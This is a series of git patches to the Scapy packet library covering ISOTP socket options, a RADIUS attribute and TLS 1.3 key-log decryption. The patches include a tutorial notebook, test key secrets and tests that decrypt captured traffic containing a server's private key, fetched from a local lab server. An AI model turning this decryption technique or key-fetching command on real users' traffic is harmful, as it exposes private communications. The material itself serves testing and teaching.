None: log_isotp.warning('Provide a basecls ') self.basecls = basecls self._init_socket() def _init_socket(self) -> None: - can_socket = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, - CAN_ISOTP) - self.__set_option_flags(can_socket, - self.ext_address, - self.rx_ext_address, - self.listen_only, - self.padding, - self.frame_txtime) - - can_socket.setsockopt(SOL_CAN_ISOTP, - CAN_ISOTP_RECV_FC, - self.__build_can_isotp_fc_options( - stmin=self.stmin, bs=self.bs)) - can_socket.setsockopt(SOL_CAN_ISOTP, - CAN_ISOTP_LL_OPTS, - self.__build_can_isotp_ll_options( - mtu=CAN_ISOTP_CANFD_MTU if self.fd - else CAN_ISOTP_DEFAULT_LL_MTU, - tx_dl=CAN_FD_ISOTP_DEFAULT_LL_TX_DL if self.fd - else CAN_ISOTP_DEFAULT_LL_TX_DL)) + can_socket = socket.socket( + socket.PF_CAN, socket.SOCK_DGRAM, CAN_ISOTP) + + self.__set_option_flags( + can_socket, + self.ext_address, + self.rx_ext_address, + self.listen_only, + self.padding, + self.frame_txtime) + + can_socket.setsockopt( + SOL_CAN_ISOTP, + CAN_ISOTP_RECV_FC, + self.__build_can_isotp_fc_options(stmin=self.stmin, bs=self.bs)) + + tx_flags = ((CANFD_FDF if self.fd else 0) + + (CANFD_BRS if (self.brs + self.fd) else 0)) + tx_dl = CAN_FD_ISOTP_DEFAULT_LL_TX_DL if self.fd else CAN_ISOTP_DEFAULT_LL_TX_DL + + can_socket.setsockopt( + SOL_CAN_ISOTP, + CAN_ISOTP_LL_OPTS, + self.__build_can_isotp_ll_options( + mtu=CAN_ISOTP_CANFD_MTU if self.fd else CAN_ISOTP_DEFAULT_LL_MTU, + tx_dl=tx_dl, + tx_flags=tx_flags)) can_socket.setsockopt( socket.SOL_SOCKET, SO_TIMESTAMPNS, @@ -366,8 +378,13 @@ def _init_socket(self) -> None: self.__bind_socket(can_socket, self.iface, self.tx_id, self.rx_id) # make sure existing sockets are closed, # required in case of a reconnect. - self.closed = False - self.close() + if getattr(self, "outs", None): + if getattr(self, "ins", None) != self.outs: + if self.outs and self.outs.fileno() != -1: + self.outs.close() + if getattr(self, "ins", None): + if self.ins.fileno() != -1: + self.ins.close() self.ins = can_socket self.outs = can_socket diff --git a/scapy/contrib/isotp/isotp_scanner.py b/scapy/contrib/isotp/isotp_scanner.py index 5e35387b924..c3d4c5bdfc8 100644 --- a/scapy/contrib/isotp/isotp_scanner.py +++ b/scapy/contrib/isotp/isotp_scanner.py @@ -225,6 +225,10 @@ def scan(sock, # type: SuperSocket noise_ids, False, pkt), timeout=sniff_time * 10, store=False) + if return_values != cleaned_ret_val: + log_isotp.error("Some ISOTP endpoints detected in first scan didn't " + "answer validation round. Possible bug on target.") + return cleaned_ret_val @@ -385,18 +389,18 @@ def isotp_scan(sock, # type: SuperSocket filter_periodic_packets(found_packets) if output_format == "text": - return generate_text_output(found_packets, extended_addressing) + return generate_text_output(found_packets, extended_addressing, fd) if output_format == "code": return generate_code_output(found_packets, can_interface, - extended_addressing) + extended_addressing, fd) if output_format == "json": return generate_json_output(found_packets, can_interface, - extended_addressing) + extended_addressing, fd) return generate_isotp_list(found_packets, can_interface or sock, - extended_addressing) + extended_addressing, fd) def generate_text_output(found_packets, extended_addressing=False, fd=False): From 7fb32a173f8567a498e25282da79569b5bf802bb Mon Sep 17 00:00:00 2001 From: TomBassa2004 <41027527+TomBassa2004@users.noreply.github.com> Date: Fri, 11 Jul 2025 14:13:40 +0300 Subject: [PATCH 1509/1632] Radius: Add timestamp attribute (#4759) --- scapy/layers/radius.py | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/scapy/layers/radius.py b/scapy/layers/radius.py index 45bdccbdd5a..14a1fd8787e 100644 --- a/scapy/layers/radius.py +++ b/scapy/layers/radius.py @@ -435,6 +435,11 @@ class RadiusAttr_Acct_Output_Gigawords(_RadiusAttrIntValue): val = 53 +class RadiusAttr_Event_Timestamp(_RadiusAttrIntValue): + """RFC 2869""" + val = 55 + + class RadiusAttr_Egress_VLANID(_RadiusAttrIntValue): """RFC 4675""" val = 56 From 0f7b0c0db7507b5af1c2e26e30668c8c976ea643 Mon Sep 17 00:00:00 2001 From: Hyun Date: Wed, 16 Jul 2025 05:02:44 +0800 Subject: [PATCH 1510/1632] Fix NSS KeyLog cannot decrypt TLS1.3 traffic. (#4767) * Fix NSS KeyLog cannot decrypt TLS1.3 traffic. * Adding TLS1.3 NSS Keylog Decryption Unit Tests. --- .../tls/notebook3_tls_compromised.ipynb | 139 ++++++++++-------- .../tls/raw_data/tls_nss_example.keys.txt | 7 +- .../tls/raw_data/tls_nss_example.pcap | Bin 4208 -> 11073 bytes scapy/layers/tls/session.py | 31 ++++ test/scapy/layers/tls/tls.uts | 16 +- 5 files changed, 128 insertions(+), 65 deletions(-) diff --git a/doc/notebooks/tls/notebook3_tls_compromised.ipynb b/doc/notebooks/tls/notebook3_tls_compromised.ipynb index c6e75010328..6b9351d6544 100644 --- a/doc/notebooks/tls/notebook3_tls_compromised.ipynb +++ b/doc/notebooks/tls/notebook3_tls_compromised.ipynb @@ -12,89 +12,89 @@ ] }, { - "cell_type": "code", - "execution_count": null, "metadata": {}, - "outputs": [], + "cell_type": "code", "source": [ "from scapy.all import *\n", "load_layer('tls')" - ] + ], + "outputs": [], + "execution_count": null }, { - "cell_type": "code", - "execution_count": null, "metadata": {}, - "outputs": [], + "cell_type": "code", "source": [ "record1_str = open('raw_data/tls_session_compromised/01_cli.raw', 'rb').read()\n", "record1 = TLS(record1_str)\n", "record1.msg[0].show()" - ] + ], + "outputs": [], + "execution_count": null }, { "cell_type": "code", - "execution_count": null, "metadata": { "scrolled": true }, - "outputs": [], "source": [ "record2_str = open('raw_data/tls_session_compromised/02_srv.raw', 'rb').read()\n", "record2 = TLS(record2_str, tls_session=record1.tls_session.mirror())\n", "record2.msg[0].show()" - ] + ], + "outputs": [], + "execution_count": null }, { "cell_type": "code", - "execution_count": null, "metadata": {}, - "outputs": [], "source": [ "# Supposing that the private key of the server was stolen,\n", "# the traffic can be decoded by registering it to the Scapy TLS session\n", "key = PrivKey('raw_data/pki/srv_key.pem')\n", "record2.tls_session.server_rsa_key = key" - ] + ], + "outputs": [], + "execution_count": null }, { "cell_type": "code", - "execution_count": null, "metadata": {}, - "outputs": [], "source": [ "record3_str = open('raw_data/tls_session_compromised/03_cli.raw', 'rb').read()\n", "record3 = TLS(record3_str, tls_session=record2.tls_session.mirror())\n", "record3.show()" - ] + ], + "outputs": [], + "execution_count": null }, { "cell_type": "code", - "execution_count": null, "metadata": {}, - "outputs": [], "source": [ "record4_str = open('raw_data/tls_session_compromised/04_srv.raw', 'rb').read()\n", "record4 = TLS(record4_str, tls_session=record3.tls_session.mirror())\n", "record4.show()" - ] + ], + "outputs": [], + "execution_count": null }, { "cell_type": "code", - "execution_count": null, "metadata": {}, - "outputs": [], "source": [ "# This is the first TLS Record containing user data. If decryption works,\n", "# you should see the string \"To boldly go where no man has gone before...\" in plaintext.\n", "record5_str = open('raw_data/tls_session_compromised/05_cli.raw', 'rb').read()\n", "record5 = TLS(record5_str, tls_session=record4.tls_session.mirror())\n", "record5.show()" - ] + ], + "outputs": [], + "execution_count": null }, { - "cell_type": "markdown", "metadata": {}, + "cell_type": "markdown", "source": [ "# Decrypting TLS Traffic Protected with PFS\n", "\n", @@ -104,14 +104,15 @@ "```\n", "cd doc/notebooks/tls/raw_data/\n", "\n", - "# Start a TLS 1.12 Server using the s_server\n", - "sudo openssl s_server -accept localhost:443 -cert pki/srv_cert.pem -key pki/srv_key.pem -WWW -tls1_2\n", + "# Start a TLS Server using the s_server\n", + "sudo openssl s_server -accept localhost:443 -cert pki/srv_cert.pem -key pki/srv_key.pem -WWW\n", "\n", "# Sniff the network and write packets to a file\n", "sudo tcpdump -i lo -w tls_nss_example.pcap port 443\n", "\n", - "# Connect to the server using s_client and retrieve the secrets.txt file\n", - "openssl s_client -connect localhost:443 -keylogfile tls_nss_example.keys.txt\n", + "# Connect to the server using TLS 1.2 and TLS 1.3, and write the keys to a file\n", + "echo -e \"GET /pki/srv_key.pem HTTP/1.0\\r\\n\" | openssl s_client -connect localhost:443 -keylogfile tls_nss_example.keys.txt -tls1_2 -ign_eof\n", + "echo -e \"GET /pki/srv_key.pem HTTP/1.0\\r\\n\" | openssl s_client -connect localhost:443 -keylogfile tls_nss_example.keys.txt -tls1_3 -ign_eof\n", "```\n", "\n", "## Decrypt a PCAP files\n", @@ -120,38 +121,58 @@ ] }, { - "cell_type": "code", - "execution_count": null, "metadata": {}, - "outputs": [], + "cell_type": "code", "source": [ "load_layer(\"tls\")\n", "\n", "conf.tls_session_enable = True\n", "conf.tls_nss_filename = \"raw_data/tls_nss_example.keys.txt\"\n", "\n", - "packets = rdpcap(\"raw_data/tls_nss_example.pcap\")" - ] + "packets = sniff(offline=\"raw_data/tls_nss_example.pcap\", session=TCPSession)" + ], + "outputs": [], + "execution_count": null }, { - "cell_type": "code", - "execution_count": null, "metadata": {}, - "outputs": [], + "cell_type": "code", "source": [ - "# Display the HTTP GET query\n", - "packets[11][TLS].show()" - ] + "# Display the TLS1.2 HTTP GET query\n", + "packets[9][TLS].show()" + ], + "outputs": [], + "execution_count": null }, { + "metadata": {}, "cell_type": "code", - "execution_count": null, + "source": [ + "# Display the answer containing the secret\n", + "packets[10][TLS].show()" + ], + "outputs": [], + "execution_count": null + }, + { "metadata": {}, + "cell_type": "code", + "source": [ + "# Display the TLS1.3 HTTP GET query\n", + "packets[27][TLS13].show()" + ], "outputs": [], + "execution_count": null + }, + { + "metadata": {}, + "cell_type": "code", "source": [ "# Display the answer containing the secret\n", - "packets[13][TLS].show()" - ] + "packets[28][TLS13].show()" + ], + "outputs": [], + "execution_count": null }, { "cell_type": "markdown", @@ -166,24 +187,23 @@ }, { "cell_type": "code", - "execution_count": null, "metadata": {}, - "outputs": [], "source": [ "# Read packets from a pcap\n", "load_layer(\"tls\")\n", "\n", + "conf.tls_session_enable = False\n", "packets = rdpcap(\"raw_data/tls_nss_example.pcap\")\n", "\n", "# Load the keys from a NSS Key Log\n", "nss_keys = load_nss_keys(\"raw_data/tls_nss_example.keys.txt\")" - ] + ], + "outputs": [], + "execution_count": null }, { "cell_type": "code", - "execution_count": null, "metadata": {}, - "outputs": [], "source": [ "# Parse the Client Hello message from its raw bytes. This configures a new tlsSession object\n", "client_hello = TLS(raw(packets[3][TLS]))\n", @@ -192,34 +212,37 @@ "server_hello = TLS(raw(packets[5][TLS]), tls_session=client_hello.tls_session.mirror())\n", "\n", "# Configure the TLS master secret retrieved from the NSS Key Log\n", - "server_hello.tls_session.master_secret = nss_keys[\"CLIENT_RANDOM\"][\"Secret\"]\n", + "server_hello.tls_session.master_secret = nss_keys[\"CLIENT_RANDOM\"][client_hello.tls_session.client_random]\n", + "server_hello.tls_session.compute_ms_and_derive_keys()\n", "\n", "# Parse remaining TLS messages\n", "client_finished = TLS(raw(packets[7][TLS]), tls_session=server_hello.tls_session.mirror())\n", - "server_finished = TLS(raw(packets[9][TLS]), tls_session=client_finished.tls_session.mirror())" - ] + "server_finished = TLS(raw(packets[8][TLS]), tls_session=client_finished.tls_session.mirror())" + ], + "outputs": [], + "execution_count": null }, { "cell_type": "code", - "execution_count": null, "metadata": {}, - "outputs": [], "source": [ "# Display the HTTP GET query\n", - "http_query = TLS(raw(packets[11][TLS]), tls_session=server_finished.tls_session.mirror())\n", + "http_query = TLS(raw(packets[9][TLS]), tls_session=server_finished.tls_session.mirror())\n", "http_query.show()" - ] + ], + "outputs": [], + "execution_count": null }, { "cell_type": "code", - "execution_count": null, "metadata": {}, - "outputs": [], "source": [ "# Display the answer containing the secret\n", - "http_response = TLS(raw(packets[13][TLS]), tls_session=http_query.tls_session.mirror())\n", + "http_response = TLS(raw(packets[10][TLS]), tls_session=http_query.tls_session.mirror())\n", "http_response.show()" - ] + ], + "outputs": [], + "execution_count": null } ], "metadata": { diff --git a/doc/notebooks/tls/raw_data/tls_nss_example.keys.txt b/doc/notebooks/tls/raw_data/tls_nss_example.keys.txt index 69734b2585b..6cf32f6e662 100644 --- a/doc/notebooks/tls/raw_data/tls_nss_example.keys.txt +++ b/doc/notebooks/tls/raw_data/tls_nss_example.keys.txt @@ -1,2 +1,7 @@ # SSL/TLS secrets log file, generated by OpenSSL -CLIENT_RANDOM c43c799f04ad31e397ee4fe14c8819a19bf5951bbc545cada407c6c7589e60ab b599798159244555ddd10d80b5552a37d327fd6e661f3520194c28ef6e8bb0af6e3fb4d4f9945a61e83a41f2345fa27a +CLIENT_RANDOM 216e876ea1a480c60145c4c80eb8d05c85b6806043105c391236cd4e88f79a21 54a828bfc25edf47070cd48b8253e8137e88082face8d7e96960756653b57f41bc6df3f45a5746bc9c6305ccd9b35ab8 +SERVER_HANDSHAKE_TRAFFIC_SECRET 74ef95570af6a305910ee6cb0f98fc5bcec0c5d5dffe5f293ae9a4d7ba2110f2 5f2fd60aecc80ee54d17d48ec58fcfccf6fe229e08055dba1a6a09297bea98fd1268bdd6fe19e15c76d7c152d17f7237 +EXPORTER_SECRET 74ef95570af6a305910ee6cb0f98fc5bcec0c5d5dffe5f293ae9a4d7ba2110f2 02aa67e90b524002f7eb00fcda23365ca6bfea5ad179d965264b5c1f6ff93483465b3c147c5070a90e47a406bd431152 +SERVER_TRAFFIC_SECRET_0 74ef95570af6a305910ee6cb0f98fc5bcec0c5d5dffe5f293ae9a4d7ba2110f2 c5f265aee5d17472c71fa889cfa351b12b9280bf74d16477161fd495c87432632908cae923e390d5d52a4719c2f896de +CLIENT_HANDSHAKE_TRAFFIC_SECRET 74ef95570af6a305910ee6cb0f98fc5bcec0c5d5dffe5f293ae9a4d7ba2110f2 bf58ee2a720cb26a594c0c7b714783a406f4daad18fbf7b7b3437bfe944d840cbc0e1843096e1c4ec92b68f230b22fa9 +CLIENT_TRAFFIC_SECRET_0 74ef95570af6a305910ee6cb0f98fc5bcec0c5d5dffe5f293ae9a4d7ba2110f2 7f3ac59f48dbe7f0fa66f92a0e691cf6ad4b84062e66b303f3149107c723ffb8424f8a3488072a8938d842b403e43229 diff --git a/doc/notebooks/tls/raw_data/tls_nss_example.pcap b/doc/notebooks/tls/raw_data/tls_nss_example.pcap index f03811d0c874643e541d58a65167f68bcfedb591..9268ae4866cf5951b33ec0a8b72c42f4453453fe 100644 GIT binary patch literal 11073 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 S8RAbh-Xl3C{Zag(^!*=#)yOLV literal 4208 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.Q2MzGY[k@" in packets[13].msg[0].data +packets = sniff(offline=scapy_path("doc/notebooks/tls/raw_data/tls_nss_example.pcap"), session=TCPSession) +assert b"GET /pki/srv_key.pem HTTP/1.0\r\n" in packets[9].msg[0].data +assert b"BEGIN PRIVATE KEY" in packets[10].msg[0].data +assert b"GET /pki/srv_key.pem HTTP/1.0\r\n" in packets[27].inner.msg[0].data +assert b"BEGIN PRIVATE KEY" in packets[28].inner.msg[0].data conf = bck_conf @@ -1602,9 +1604,11 @@ if shutil.which("editcap"): pcapng_path = get_temp_file() exit_status = os.system("editcap --inject-secrets tls,%s %s %s" % (key_log_path, pcap_path, pcapng_path)) assert exit_status == 0 - packets = rdpcap(pcapng_path) - assert b"GET /secret.txt HTTP/1.0\n" in packets[11].msg[0].data - assert b"z2|gxarIKOxt,G1d>.Q2MzGY[k@" in packets[13].msg[0].data + packets = 